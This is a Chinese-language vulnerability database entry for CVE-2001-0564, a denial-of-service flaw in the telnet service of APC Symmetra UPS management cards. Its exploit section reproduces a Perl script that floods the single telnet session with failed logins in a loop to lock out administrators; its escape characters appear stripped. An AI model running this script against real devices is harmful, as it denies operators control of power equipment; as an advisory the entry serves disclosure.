APC Telnet管理服务拒绝漏洞

APC Telnet管理服务拒绝漏洞

漏洞ID 1106228 漏洞类型 设计错误
发布时间 2001-02-26 更新时间 2005-08-22
图片[1]-APC Telnet管理服务拒绝漏洞-安全小百科CVE编号 CVE-2001-0564
图片[2]-APC Telnet管理服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200108-111
漏洞平台 Hardware CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20654
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-111
|漏洞详情
APCWeb/SNMP管理卡Firmware310之前版本只支持一个远程登录连接。远程攻击者可以借助重复失败登录尝试而临时锁卡造成服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/2430/info

Symmetra is an Uninterruptable Power Supply manufactured by American Power Conversation Corporation (APC). Symmetra supports network options that allow a remote administrator to access the system via telnet, and gather information from the power supply via SNMP.

A problem with the network software used with the Symmetra can allow a denial of service to the system, thus preventing administrative access. This problem is due to the handling of the telnet protocol by the firmware of the power supply. The system does not support more than one telnet session at a time, and when it encounters three failed login attempts, discontinues access for a configurable period between 1 and 10 minutes.

Therefore, it is possible for a malicious user to launch an remote attack against the telnet service of the power supply, and prevent administrative access to the power supply for the duration of the attack. This vulnerability may affect other APC UPS products as well. 

#!/usr/bin/perl
#[email protected]
#apc management card dos

$user = "blacksun";
$time = "$ARGV[1]";

use IO::Socket;
$ip = "$ARGV[0]";
$port = "23";
if ($#ARGV<0) {
print " useage: $0 <hostname> <delay in seconds>n";
exit();
}
$socket = IO::Socket::INET->new(
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>$port,);


print "Apc management card DoSn";
print "[email protected]";


sub dos() {
print "DoS started will attack every $time secondsn";
print "Ctrl+C to exitn";
print $socket "$userr";
print $socket "$userr";
print $socket "$userr";
print $socket "$userr";
print $socket "$userr";
print $socket "$userr";
print "n";
close $socket;
sleep($time);          
&dos;

}
&dos;
#hong kong danger duo
|参考资料

来源:BUGTRAQ
名称:20010225APCweb/snmp/telnetmanagementcarddos
链接:http://archives.neohapsis.com/archives/bugtraq/2001-02/0436.html
来源:XF
名称:apc-telnet-dos(6199)
链接:http://xforce.iss.net/static/6199.php
来源:BID
名称:2430
链接:http://www.securityfocus.com/bid/2430
来源:ftp.apcftp.com
链接:ftp://ftp.apcftp.com/hardware/webcard/firmware/sy/v310/install.txt

相关推荐: QMail-QMTPD RELAYCLIENT Environment Variable Integer Overflow Vulnerability

QMail-QMTPD RELAYCLIENT Environment Variable Integer Overflow Vulnerability 漏洞ID 1098747 漏洞类型 Boundary Condition Error 发布时间 2004-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享